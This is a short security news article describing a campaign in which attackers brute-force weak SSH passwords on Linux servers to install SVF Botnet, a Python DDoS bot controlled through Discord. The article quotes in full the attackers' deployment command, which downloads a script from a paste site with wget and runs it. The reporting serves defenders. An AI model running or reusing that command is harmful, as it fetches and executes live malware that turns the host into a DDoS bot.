Threat Actors Attacking Linux SSH Servers to Deploy SVF Botnet

Cybersecurity researchers have uncovered a sophisticated attack campaign targeting poorly managed Linux servers through SSH brute force attacks to deploy the SVF Botnet, a Python-based distributed denial-of-service malware.

The malware leverages Discord as its command-and-control infrastructure and employs multiple proxy servers to amplify its attack capabilities against targeted systems.

The SVF Botnet represents a notable evolution in DDoS attack tools, combining traditional brute force techniques with modern communication platforms.

Threat actors exploit Linux servers with weak SSH credentials, transforming compromised systems into powerful DDoS weapons capable of launching both Layer 7 HTTP floods and Layer 4 UDP floods against victims.

ASEC analysts identified this malware through their honeypot monitoring systems, which detected numerous attempts to compromise SSH services using dictionary and brute force attacks.

The researchers observed that SVF Bot was created by the “SVF Team” allegedly for entertainment purposes after their previous PuTTY-based botnet ceased functioning.

The attack campaign demonstrates the persistent threat facing inadequately secured Linux infrastructure, particularly systems exposed to the internet with default or weak authentication mechanisms.

Infection Mechanism and Deployment

The SVF Botnet’s installation process showcases sophisticated automation through a single command execution. Upon successful SSH compromise, attackers deploy the malware using: python -m venv venv; source ./venv/bin/activate; pip install discord discord.py requests aiohttp lxml; wget https://termbin.com/4ccx -O main.py; python main.py -s 5

This command establishes a Python virtual environment, installs required dependencies including Discord libraries, downloads the malware payload, and executes it with server group identifier “5”.

The malware authenticates with Discord servers using embedded bot tokens and immediately reports successful infections through webhooks, enabling real-time botnet management and coordination for subsequent DDoS campaigns.

Boost detection, reduce alert fatigue, accelerate response; all with an interactive sandbox built for security teams -> Try ANY.RUN Now